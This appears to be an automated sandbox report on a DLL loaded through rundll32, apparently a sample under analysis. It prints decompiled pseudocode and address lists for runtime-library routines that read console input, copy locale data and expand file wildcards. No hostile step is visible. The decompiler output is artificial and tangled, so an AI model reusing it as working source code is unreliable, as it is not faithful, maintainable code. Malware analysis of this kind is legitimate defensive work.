									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E1002449E(__eflags))) = 0xc;
									 *(E1002448B(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E100268B3(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E1002448B(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E1002449E(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E1002448B(_t246)) =  *_t197 & 0x00000000;
					_t139 = E1002449E(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x10039c3e
0x10039c42
0x10039c45
0x10039c5f
0x10039c61
0x10039fc6
0x10039fc6
0x10039fcb
0x10039fcb
0x10039fd3
0x10039fd9
0x10039fd9
0x00000000
0x10039fd9
0x10039c67
0x10039c6d
0x00000000
0x00000000
0x10039c77
0x10039c7d
0x10039c80
0x10039c83
0x10039c8d
0x10039c90
0x10039c93
0x10039c97
0x10039c99
0x00000000
0x00000000
0x10039c9f
0x10039ca2
0x10039ca8
0x10039cc2
0x10039cc4
0x10039fc2
0x00000000
0x10039fc2
0x10039cca
0x10039ccd
0x00000000
0x00000000
0x10039cd3
0x10039cd7
0x00000000
0x00000000
0x10039cdd
0x10039ce0
0x10039ce4
0x10039ceb
0x10039ced
0x10039ced
0x10039cf0
0x10039d45
0x10039d47
0x10039d0d
0x10039d12
0x10039d19
0x10039d1f
0x00000000
0x10039d49
0x10039d4b
0x10039d4c
0x10039d4e
0x10039d51
0x10039d53
0x10039d55
0x10039d57
0x10039d57
0x10039d62
0x10039d64
0x10039d6b
0x10039d70
0x10039d73
0x10039d76
0x10039d78
0x10039d9c
0x10039da4
0x10039da7
0x10039dae
0x10039db5
0x10039db9
0x10039dbb
0x10039dbe
0x10039dc5
0x10039dc5
0x10039dc8
0x10039dca
0x10039dcd
0x10039dd2
0x10039dd5
0x10039dde
0x10039de2
0x10039de5
0x10039de7
0x10039ded
0x10039def
0x10039df8
0x10039df9
0x10039dfb
0x10039dff
0x10039e00
0x10039e04
0x10039e07
0x10039e11
0x10039e16
0x10039e19
0x10039e28
0x10039e2c
0x10039e2f
0x10039e31
0x10039e33
0x10039e35
0x10039e3a
0x10039e3c
0x10039e40
0x10039e41
0x10039e47
0x10039e51
0x10039e52
0x10039e55
0x10039e5a
0x10039e5d
0x10039e6c
0x10039e70
0x10039e73
0x10039e75
0x10039e77
0x10039e79
0x10039e7b
0x10039e81
0x10039e81
0x10039e82
0x10039e91
0x10039e94
0x10039e95
0x10039e95
0x10039e79
0x10039e75
0x10039e5d
0x10039e35
0x10039e31
0x10039e19
0x10039def
0x10039de7
0x10039e9b
0x10039ea1
0x10039ea3
0x10039f16
0x10039f16
0x10039f1a
0x10039f2a
0x10039f30
0x10039f32
0x10039f8e
0x10039f8e
0x10039f96
0x10039f97
0x10039f99
0x10039fb2
0x10039fb5
0x10039ef2
0x10039ef3
0x00000000
0x10039ef8
0x10039fbb
0x00000000
0x10039fbb
0x10039fa0
0x10039fab
0x00000000
0x10039fab
0x10039f34
0x10039f37
0x10039f3a
0x00000000
0x00000000
0x10039f3c
0x10039f3c
0x10039f3f
0x10039f42
0x10039f45
0x10039f4c
0x10039f51
0x10039f53
0x10039f57
0x10039f72
0x10039f76
0x10039f77
0x10039f7a
0x10039f7b
0x10039f87
0x10039f7d
0x10039f7d
0x10039f7d
0x10039f59
0x10039f59
0x10039f59
0x10039f64
0x10039f69
0x10039f6c
0x10039f6c
0x00000000
0x10039f51
0x10039ea8
0x10039eab
0x10039eb2
0x10039eb7
0x00000000
0x00000000
0x10039ec0
0x10039ec6
0x10039ec8
0x00000000
0x00000000
0x10039eca
0x10039ece
0x00000000
0x00000000
0x10039ee2
0x10039ee8
0x10039eea
0x10039f0e
0x10039f11
0x00000000
0x10039f11
0x10039eec
0x00000000
0x10039d7a
0x10039d7f
0x10039d8a
0x10039ef9
0x10039ef9
0x10039ef9
0x10039efc
0x10039efd
0x00000000
0x10039f05
0x10039d78
0x10039d47
0x10039cf2
0x10039cf5
0x10039d09
0x10039d0b
0x10039d2c
0x10039d2f
0x10039d32
0x10039d35
0x00000000
0x10039d35
0x00000000
0x10039cf7
0x10039cf7
0x10039cfa
0x10039cfd
0x00000000
0x10039cfd
0x10039cf5
0x10039caa
0x10039caf
0x10039cb7
0x00000000
0x10039c47
0x10039c4c
0x10039c4f
0x10039c54
0x10039fde
0x00000000
0x10039fde

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14334cd124f7857333d6a87dc4dbb4beeafbf5ac604f7dd62759596a9d004c8b
Instruction ID: 06d7e98826e9061cf5f9f575d1909f9ed043f22c31c120a23b2795546a4967bb
Opcode Fuzzy Hash: 14334cd124f7857333d6a87dc4dbb4beeafbf5ac604f7dd62759596a9d004c8b
Instruction Fuzzy Hash: E1C1D074A04259AFEB02DF98C981BADBBF4EF4A351F114159E905EF392C734AD42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1002F19F, Relevance: 13.7, APIs: 9, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E1002F19F(void* __edx, char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				signed int _t60;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t77;
				char _t82;
				void* _t93;
				signed int _t96;
				char _t107;
				char _t108;
				void* _t113;
				char* _t114;
				signed int _t120;
				signed int* _t121;
				char _t123;
				intOrPtr* _t125;
				char* _t130;

				_t113 = __edx;
				_t123 = _a4;
				_v24 = _t123;
				_v20 = 0;
				if( *((intOrPtr*)(_t123 + 0xb0)) != 0 ||  *((intOrPtr*)(_t123 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E10026850(1, 0x50);
					if(_t93 != 0) {
						_t96 = 0x14;
						memcpy(_t93,  *(_t123 + 0x88), _t96 << 2);
						_t125 = E10024214(4);
						_t120 = 0;
						_v8 = _t125;
						E100268B3(0);
						if(_t125 != 0) {
							 *_t125 = 0;
							_t123 = _a4;
							if( *((intOrPtr*)(_t123 + 0xb0)) == 0) {
								_t53 =  *0x1004d788; // 0x1004d7dc
								 *_t93 = _t53;
								_t54 =  *0x1004d78c; // 0x1004e868
								 *((intOrPtr*)(_t93 + 4)) = _t54;
								_t55 =  *0x1004d790; // 0x1004e868
								 *((intOrPtr*)(_t93 + 8)) = _t55;
								_t56 =  *0x1004d7b8; // 0x1004d7e0
								 *((intOrPtr*)(_t93 + 0x30)) = _t56;
								_t57 =  *0x1004d7bc; // 0x1004e86c
								 *((intOrPtr*)(_t93 + 0x34)) = _t57;
								L19:
								 *_v8 = 1;
								if(_t120 != 0) {
									 *_t120 = 1;
								}
								goto L21;
							}
							_t121 = E10024214(4);
							_v12 = _t121;
							E100268B3(0);
							_push(_t93);
							if(_t121 != 0) {
								 *_t121 =  *_t121 & 0x00000000;
								_t122 =  *((intOrPtr*)(_t123 + 0xb0));
								_push(0xe);
								_push( *((intOrPtr*)(_t123 + 0xb0)));
								_push(1);
								_push( &_v24);
								_t69 = E10037D5C(_t113);
								_t16 = _t93 + 4; // 0x4
								_t71 = E10037D5C(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0xf, _t16);
								_t18 = _t93 + 8; // 0x8
								_t74 = E10037D5C(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0x10, _t18);
								_t77 = E10037D5C(_t113,  &_v24, 2, _t122, 0xe, _t93 + 0x30);
								_t22 = _t93 + 0x34; // 0x34
								if((E10037D5C(_t113,  &_v24, 2, _t122, 0xf, _t22) | _t69 | _t71 | _t74 | _t77) == 0) {
									_t114 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t82 =  *_t114;
										if(_t82 == 0) {
											break;
										}
										_t30 = _t82 - 0x30; // -48
										_t107 = _t30;
										if(_t107 > 9) {
											if(_t82 != 0x3b) {
												L16:
												_t114 = _t114 + 1;
												continue;
											}
											_t130 = _t114;
											do {
												_t108 =  *((intOrPtr*)(_t130 + 1));
												 *_t130 = _t108;
												_t130 = _t130 + 1;
											} while (_t108 != 0);
											continue;
										}
										 *_t114 = _t107;
										goto L16;
									}
									_t120 = _v12;
									_t123 = _a4;
									goto L19;
								}
								E1002F136(_t93);
								E100268B3(_t93);
								E100268B3(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E100268B3(_v8);
								return _v16;
							}
							E100268B3();
							goto L12;
						}
						E100268B3(_t93);
						return 1;
					}
					return 1;
				} else {
					_t120 = 0;
					_v8 = 0;
					_t93 = 0x1004d788;
					L21:
					_t60 =  *(_t123 + 0x80);
					if(_t60 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t123 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t60 | 0xffffffff) == 0) {
							E100268B3( *((intOrPtr*)(_t123 + 0x7c)));
							E100268B3( *(_t123 + 0x88));
						}
					}
					 *((intOrPtr*)(_t123 + 0x7c)) = _v8;
					 *(_t123 + 0x80) = _t120;
					 *(_t123 + 0x88) = _t93;
					return 0;
				}
			}

0x1002f19f
0x1002f1a9
0x1002f1af
0x1002f1b2
0x1002f1bb
0x1002f1da
0x1002f1e2
0x1002f1e8
0x1002f1fb
0x1002f1fc
0x1002f205
0x1002f207
0x1002f20a
0x1002f20d
0x1002f216
0x1002f227
0x1002f229
0x1002f232
0x1002f381
0x1002f386
0x1002f388
0x1002f38d
0x1002f390
0x1002f395
0x1002f398
0x1002f39d
0x1002f3a0
0x1002f3a5
0x1002f314
0x1002f31a
0x1002f31e
0x1002f320
0x1002f320
0x00000000
0x1002f31e
0x1002f23f
0x1002f243
0x1002f246
0x1002f24d
0x1002f250
0x1002f25d
0x1002f263
0x1002f269
0x1002f26b
0x1002f26c
0x1002f26e
0x1002f26f
0x1002f274
0x1002f283
0x1002f28a
0x1002f297
0x1002f2ab
0x1002f2b5
0x1002f2cc
0x1002f2f8
0x1002f308
0x1002f308
0x1002f30c
0x00000000
0x00000000
0x1002f2fd
0x1002f2fd
0x1002f303
0x1002f36f
0x1002f307
0x1002f307
0x00000000
0x1002f307
0x1002f371
0x1002f373
0x1002f373
0x1002f376
0x1002f378
0x1002f37b
0x00000000
0x1002f37f
0x1002f305
0x00000000
0x1002f305
0x1002f30e
0x1002f311
0x00000000
0x1002f311
0x1002f2cf
0x1002f2d5
0x1002f2dd
0x1002f2e5
0x1002f2e9
0x1002f2ed
0x00000000
0x1002f2f5
0x1002f252
0x00000000
0x1002f257
0x1002f219
0x00000000
0x1002f221
0x00000000
0x1002f1c5
0x1002f1c5
0x1002f1c7
0x1002f1ca
0x1002f322
0x1002f322
0x1002f32a
0x1002f32c
0x1002f32c
0x1002f334
0x1002f339
0x1002f33d
0x1002f342
0x1002f34d
0x1002f353
0x1002f33d
0x1002f357
0x1002f35c
0x1002f362
0x00000000
0x1002f362

APIs

_free.LIBCMT ref: 1002F20D
_free.LIBCMT ref: 1002F219
_free.LIBCMT ref: 1002F342
_free.LIBCMT ref: 1002F34D

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dbc6e38a68f65743a5a9da2c763618c3036e629d81cfe0a0fa3a4656d0e27345
Instruction ID: d13b4a520b74060ec193128ac1be29b222bffbea19a5bef822ff00477154d023
Opcode Fuzzy Hash: dbc6e38a68f65743a5a9da2c763618c3036e629d81cfe0a0fa3a4656d0e27345
Instruction Fuzzy Hash: 9F61E5759003059FE720DF64EC41BAAB7F8EF49790FA1416EE959EB241EB70AD04CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10026AD8, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E10026AD8(void* __esi, signed int _a4, signed int* _a8) {
				signed int _v0;
				intOrPtr _v4;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short _v18;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int* _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v56;
				signed int _v60;
				signed int _v68;
				signed int* _v72;
				signed int _v84;
				signed int* _v100;
				signed int _v112;
				intOrPtr* _v160;
				intOrPtr* _v200;
				intOrPtr* _v232;
				intOrPtr* _v236;
				intOrPtr _v240;
				signed int _v252;
				struct _WIN32_FIND_DATAW _v616;
				char _v617;
				intOrPtr* _v624;
				union _FINDEX_INFO_LEVELS _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				union _FINDEX_INFO_LEVELS _v644;
				union _FINDEX_INFO_LEVELS _v648;
				signed int _v652;
				signed int _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				signed int _v676;
				union _FINDEX_INFO_LEVELS _v680;
				union _FINDEX_INFO_LEVELS _v684;
				intOrPtr _v852;
				void* __ebp;
				intOrPtr* _t216;
				signed int _t217;
				signed int _t219;
				signed int _t224;
				signed int _t225;
				signed int _t235;
				signed int _t237;
				signed int _t238;
				signed int _t242;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t249;
				signed int _t254;
				signed int _t255;
				intOrPtr* _t266;
				intOrPtr _t268;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				signed int _t279;
				signed int _t281;
				signed int _t286;
				signed int _t289;
				char _t291;
				signed char _t292;
				signed int _t298;
				union _FINDEX_INFO_LEVELS _t302;
				signed int _t308;
				union _FINDEX_INFO_LEVELS _t311;
				intOrPtr* _t319;
				signed int _t322;
				intOrPtr _t327;
				signed int _t332;
				signed int _t334;
				signed int _t335;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				intOrPtr _t344;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int* _t352;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t360;
				signed int* _t361;
				signed int _t364;
				signed int _t366;
				void* _t369;
				void* _t372;
				union _FINDEX_INFO_LEVELS _t373;
				signed int _t376;
				signed int* _t378;
				signed int* _t381;
				signed int _t383;
				signed int _t385;
				signed int _t388;
				signed int _t389;
				signed int _t391;
				signed int _t397;
				intOrPtr* _t398;
				signed int _t403;
				intOrPtr* _t404;
				signed int _t406;
				void* _t408;
				intOrPtr* _t409;
				signed int _t412;
				intOrPtr* _t415;
				signed int _t420;
				signed int _t426;
				signed int _t428;
				intOrPtr* _t439;
				signed int _t442;
				short _t443;
				signed int _t448;
				intOrPtr* _t449;
				signed int _t457;
				signed int _t459;
				intOrPtr* _t460;
				signed int _t465;
				void* _t466;
				void* _t467;
				signed int _t469;
				signed int _t470;
				signed int _t473;
				signed int _t476;
				signed int _t478;
				signed int _t480;
				signed int _t482;
				intOrPtr _t483;
				signed int _t485;
				signed int* _t490;
				signed int _t491;
				signed int _t493;
				signed int _t494;
				signed int _t495;
				signed int _t497;
				signed int* _t498;
				signed int _t499;
				signed int _t501;
				signed int _t502;
				signed int _t505;
				void* _t506;
				intOrPtr _t507;
				void* _t508;
				signed int _t511;
				signed int _t516;
				void* _t517;
				void* _t518;
				signed int _t519;
				void* _t520;
				void* _t521;
				signed int _t522;
				void* _t523;
				void* _t524;
				void* _t525;
				signed int _t526;
				void* _t527;
				void* _t528;

				_t216 = _a8;
				_t521 = _t520 - 0x28;
				_t532 = _t216;
				if(_t216 != 0) {
					_t490 = _a4;
					_t364 = 0;
					 *_t216 = 0;
					_t476 = 0;
					_t217 =  *_t490;
					_t381 = 0;
					_v44 = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t217;
					if(_t217 == 0) {
						L9:
						_v8 = _t364;
						_t219 = _t381 - _t476;
						_t491 = _t476;
						_v12 = _t491;
						_t456 = (_t219 >> 2) + 1;
						_t221 = _t219 + 3 >> 2;
						__eflags = _t381 - _t491;
						_v16 = (_t219 >> 2) + 1;
						asm("sbb esi, esi");
						_t493 =  !_t491 & _t219 + 0x00000003 >> 0x00000002;
						__eflags = _t493;
						if(_t493 != 0) {
							_t355 = _t476;
							_t473 = _t364;
							do {
								_t449 =  *_t355;
								_t20 = _t449 + 1; // 0x1
								_v20 = _t20;
								do {
									_t357 =  *_t449;
									_t449 = _t449 + 1;
									__eflags = _t357;
								} while (_t357 != 0);
								_t364 = _t364 + 1 + _t449 - _v20;
								_t355 = _v12 + 4;
								_t473 = _t473 + 1;
								_v12 = _t355;
								__eflags = _t473 - _t493;
							} while (_t473 != _t493);
							_t456 = _v16;
							_v8 = _t364;
							_t364 = 0;
							__eflags = 0;
						}
						_t494 = E10010F75(_t221, _t456, _v8, 1);
						_t522 = _t521 + 0xc;
						__eflags = _t494;
						if(_t494 != 0) {
							_v12 = _t476;
							_t224 = _t494 + _v16 * 4;
							_t382 = _t224;
							_v28 = _t224;
							_t225 = _t476;
							_v16 = _t224;
							__eflags = _t225 - _v40;
							if(_t225 == _v40) {
								L24:
								_v12 = _t364;
								 *_a8 = _t494;
								_t495 = _t364;
								goto L25;
							} else {
								_t459 = _t494 - _t476;
								__eflags = _t459;
								_v32 = _t459;
								do {
									_t235 =  *_t225;
									_t460 = _t235;
									_v24 = _t235;
									_v20 = _t460 + 1;
									do {
										_t237 =  *_t460;
										_t460 = _t460 + 1;
										__eflags = _t237;
									} while (_t237 != 0);
									_t461 = _t460 - _v20;
									_t238 = _t460 - _v20 + 1;
									_push(_t238);
									_v20 = _t238;
									_t242 = E100315C1(_t382, _v28 - _t382 + _v8, _v24);
									_t522 = _t522 + 0x10;
									__eflags = _t242;
									if(_t242 != 0) {
										_push(_t364);
										_push(_t364);
										_push(_t364);
										_push(_t364);
										_push(_t364);
										E1000E341();
										asm("int3");
										_t516 = _t522;
										_t523 = _t522 - 0x34;
										_t244 =  *0x1004d054; // 0x944e5696
										_v84 = _t244 ^ _t516;
										_t246 = _v68;
										_v112 = _t246;
										_push(_t494);
										_t498 = _v72;
										_v100 = _t498;
										__eflags = _t246;
										if(__eflags != 0) {
											_push(_t364);
											_push(_t476);
											_t478 = 0;
											 *_t246 = 0;
											_t366 = 0;
											_t247 =  *_t498;
											_t388 = 0;
											_v616.cAlternateFileName = 0;
											_v48 = 0;
											_v44 = 0;
											__eflags = _t247;
											if(_t247 == 0) {
												L42:
												_v24 = _t478;
												_t249 = _t388 - _t366;
												_t499 = _t366;
												_v28 = _t499;
												_t464 = (_t249 >> 2) + 1;
												_t251 = _t249 + 3 >> 2;
												__eflags = _t388 - _t499;
												_v36 = (_t249 >> 2) + 1;
												asm("sbb esi, esi");
												_t501 =  !_t499 & _t249 + 0x00000003 >> 0x00000002;
												__eflags = _t501;
												if(_t501 != 0) {
													_t342 = _t366;
													_t470 = _t478;
													do {
														_t439 =  *_t342;
														_t87 = _t439 + 2; // 0x2
														_v32 = _t87;
														do {
															_t344 =  *_t439;
															_t439 = _t439 + 2;
															__eflags = _t344 - _t478;
														} while (_t344 != _t478);
														_v24 = _v24 + 1 + (_t439 - _v32 >> 1);
														_t342 = _v28 + 4;
														_t470 = _t470 + 1;
														_v28 = _t342;
														__eflags = _t470 - _t501;
													} while (_t470 != _t501);
													_t464 = _v36;
												}
												_t502 = E10010F75(_t251, _t464, _v24, 2);
												_t524 = _t523 + 0xc;
												__eflags = _t502;
												if(_t502 != 0) {
													_v28 = _t366;
													_t254 = _t502 + _v36 * 4;
													_t465 = _t254;
													_v60 = _t254;
													_t255 = _t366;
													_v36 = _t465;
													__eflags = _t255 - _v48;
													if(_t255 == _v48) {
														L57:
														_v24 = _t478;
														 *_v40 = _t502;
														_t503 = _t478;
														goto L58;
													} else {
														_t397 = _t502 - _t366;
														__eflags = _t397;
														_v20 = _t397;
														do {
															_t266 =  *_t255;
															_t398 = _t266;
															_v56 = _t266;
															_v32 = _t398 + 2;
															do {
																_t268 =  *_t398;
																_t398 = _t398 + 2;
																__eflags = _t268 - _t478;
															} while (_t268 != _t478);
															_t269 = (_t398 - _v32 >> 1) + 1;
															_push(_t269);
															_v32 = _t269;
															_t403 = _t465 - _v60 >> 1;
															_t272 = E1002FBCB(_t465, _v24 - _t403, _v56);
															_t524 = _t524 + 0x10;
															__eflags = _t272;
															if(_t272 != 0) {
																_push(_t478);
																_push(_t478);
																_push(_t478);
																_push(_t478);
																_push(_t478);
																E1000E341();
																asm("int3");
																_push(_t516);
																_t517 = _t524;
																_push(_t403);
																_t404 = _v160;
																_t136 = _t404 + 1; // 0x1
																_t466 = _t136;
																do {
																	_t274 =  *_t404;
																	_t404 = _t404 + 1;
																	__eflags = _t274;
																} while (_t274 != 0);
																_push(_t478);
																_t480 = _a4;
																_t406 = _t404 - _t466 + 1;
																_v16 = _t406;
																__eflags = _t406 -  !_t480;
																if(_t406 <=  !_t480) {
																	_push(_t366);
																	_t139 = _t480 + 1; // 0x1
																	_t369 = _t139 + _t406;
																	_t506 = E10026850(_t369, 1);
																	_t408 = _t502;
																	__eflags = _t480;
																	if(_t480 == 0) {
																		L73:
																		_push(_v16);
																		_t369 = _t369 - _t480;
																		_t279 = E100315C1(_t506 + _t480, _t369, _v4);
																		_t525 = _t524 + 0x10;
																		__eflags = _t279;
																		if(_t279 != 0) {
																			goto L78;
																		} else {
																			_t378 = _a8;
																			_t335 = E100278B8(_t378);
																			_v16 = _t335;
																			__eflags = _t335;
																			if(_t335 == 0) {
																				 *(_t378[1]) = _t506;
																				_t511 = 0;
																				_t148 =  &(_t378[1]);
																				 *_t148 = _t378[1] + 4;
																				__eflags =  *_t148;
																			} else {
																				E100268B3(_t506);
																				_t511 = _v16;
																			}
																			E100268B3(0);
																			_t338 = _t511;
																			goto L70;
																		}
																	} else {
																		_push(_t480);
																		_t340 = E100315C1(_t506, _t369, _v0);
																		_t525 = _t524 + 0x10;
																		__eflags = _t340;
																		if(_t340 != 0) {
																			L78:
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			E1000E341();
																			asm("int3");
																			_push(_t517);
																			_t518 = _t525;
																			_push(_t408);
																			_t409 = _v200;
																			_push(_t369);
																			_push(0);
																			__eflags = 0;
																			_t151 = _t409 + 2; // 0x2
																			_t467 = _t151;
																			do {
																				_t281 =  *_t409;
																				_t409 = _t409 + 2;
																				__eflags = _t281;
																			} while (_t281 != 0);
																			_t482 = _v0;
																			_t412 = (_t409 - _t467 >> 1) + 1;
																			_v20 = _t412;
																			__eflags = _t412 -  !_t482;
																			if(_t412 <=  !_t482) {
																				_push(_t506);
																				_t154 = _t482 + 1; // 0x1
																				_t372 = _t154 + _t412;
																				_t507 = E10026850(_t372, 2);
																				__eflags = _t482;
																				if(_t482 == 0) {
																					L86:
																					_push(_v20);
																					_t372 = _t372 - _t482;
																					_t286 = E1002FBCB(_t507 + _t482 * 2, _t372, _v8);
																					_t526 = _t525 + 0x10;
																					__eflags = _t286;
																					if(_t286 != 0) {
																						goto L91;
																					} else {
																						_t485 = _a4;
																						_t376 = E1002793F(_t485);
																						__eflags = _t376;
																						if(_t376 == 0) {
																							 *((intOrPtr*)( *((intOrPtr*)(_t485 + 4)))) = _t507;
																							 *((intOrPtr*)(_t485 + 4)) =  *((intOrPtr*)(_t485 + 4)) + 4;
																							_t376 = 0;
																							__eflags = 0;
																						} else {
																							E100268B3(_t507);
																						}
																						E100268B3(0);
																						_t332 = _t376;
																						goto L83;
																					}
																				} else {
																					_push(_t482);
																					_t334 = E1002FBCB(_t507, _t372, _v4);
																					_t526 = _t525 + 0x10;
																					__eflags = _t334;
																					if(_t334 != 0) {
																						L91:
																						_push(0);
																						_push(0);
																						_push(0);
																						_push(0);
																						_push(0);
																						E1000E341();
																						asm("int3");
																						_push(_t518);
																						_t519 = _t526;
																						_t527 = _t526 - 0x298;
																						_t289 =  *0x1004d054; // 0x944e5696
																						_v252 = _t289 ^ _t519;
																						_t415 = _v236;
																						_t468 = _v232;
																						_push(_t372);
																						_push(_t482);
																						_t483 = _v240;
																						_v852 = _t468;
																						__eflags = _t415 - _t483;
																						if(_t415 != _t483) {
																							while(1) {
																								_t327 =  *_t415;
																								__eflags = _t327 - 0x2f;
																								if(_t327 == 0x2f) {
																									break;
																								}
																								__eflags = _t327 - 0x5c;
																								if(_t327 != 0x5c) {
																									__eflags = _t327 - 0x3a;
																									if(_t327 != 0x3a) {
																										_t415 = E10031610(_t483, _t415);
																										__eflags = _t415 - _t483;
																										if(_t415 != _t483) {
																											continue;
																										}
																									}
																								}
																								break;
																							}
																							_t468 = _v624;
																						}
																						_t291 =  *_t415;
																						_v617 = _t291;
																						__eflags = _t291 - 0x3a;
																						if(_t291 != 0x3a) {
																							L102:
																							_t373 = 0;
																							__eflags = _t291 - 0x2f;
																							if(__eflags == 0) {
																								L105:
																								_t292 = 1;
																							} else {
																								__eflags = _t291 - 0x5c;
																								if(__eflags == 0) {
																									goto L105;
																								} else {
																									__eflags = _t291 - 0x3a;
																									_t292 = 0;
																									if(__eflags == 0) {
																										goto L105;
																									}
																								}
																							}
																							_v684 = _t373;
																							_v680 = _t373;
																							_push(_t507);
																							asm("sbb eax, eax");
																							_v676 = _t373;
																							_v672 = _t373;
																							_v652 =  ~(_t292 & 0x000000ff) & _t415 - _t483 + 0x00000001;
																							_v668 = _t373;
																							_v664 = _t373;
																							_t298 = E10026A9E(_t415 - _t483 + 1, _t483,  &_v684, E100276E1(_t468, __eflags));
																							_t528 = _t527 + 0xc;
																							asm("sbb eax, eax");
																							_t302 = FindFirstFileExW( !( ~_t298) & _v676, _t373,  &_v616, _t373, _t373, _t373);
																							_t508 = _t302;
																							__eflags = _t508 - 0xffffffff;
																							if(_t508 != 0xffffffff) {
																								_t420 =  *((intOrPtr*)(_v624 + 4)) -  *_v624;
																								__eflags = _t420;
																								_v656 = _t420 >> 2;
																								do {
																									_v648 = _t373;
																									_v644 = _t373;
																									_v640 = _t373;
																									_v636 = _t373;
																									_v632 = _t373;
																									_v628 = _t373;
																									_t308 = E100269CF( &(_v616.cFileName),  &_v648,  &_v617, E100276E1(_t468, __eflags));
																									_t528 = _t528 + 0x10;
																									asm("sbb eax, eax");
																									_t311 =  !( ~_t308) & _v640;
																									__eflags =  *_t311 - 0x2e;
																									if( *_t311 != 0x2e) {
																										L113:
																										_push(_v624);
																										_push(_v652);
																										_push(_t483);
																										_push(_t311);
																										L66();
																										_t528 = _t528 + 0x10;
																										_v660 = _t311;
																										__eflags = _t311;
																										if(_t311 != 0) {
																											__eflags = _v628 - _t373;
																											if(_v628 != _t373) {
																												E100268B3(_v640);
																												_t311 = _v660;
																											}
																											_t373 = _t311;
																										} else {
																											goto L114;
																										}
																									} else {
																										_t426 =  *((intOrPtr*)(_t311 + 1));
																										__eflags = _t426;
																										if(_t426 == 0) {
																											L114:
																											__eflags = _v628 - _t373;
																											if(_v628 != _t373) {
																												E100268B3(_v640);
																											}
																											goto L116;
																										} else {
																											__eflags = _t426 - 0x2e;
																											if(_t426 != 0x2e) {
																												goto L113;
																											} else {
																												__eflags =  *((intOrPtr*)(_t311 + 2)) - _t373;
																												if( *((intOrPtr*)(_t311 + 2)) == _t373) {
																													goto L114;
																												} else {
																													goto L113;
																												}
																											}
																										}
																									}
																									L122:
																									FindClose(_t508);
																									goto L123;
																									L116:
																									__eflags = FindNextFileW(_t508,  &_v616);
																								} while (__eflags != 0);
																								_t319 = _v624;
																								_t428 = _v656;
																								_t468 =  *_t319;
																								_t322 =  *((intOrPtr*)(_t319 + 4)) -  *_t319 >> 2;
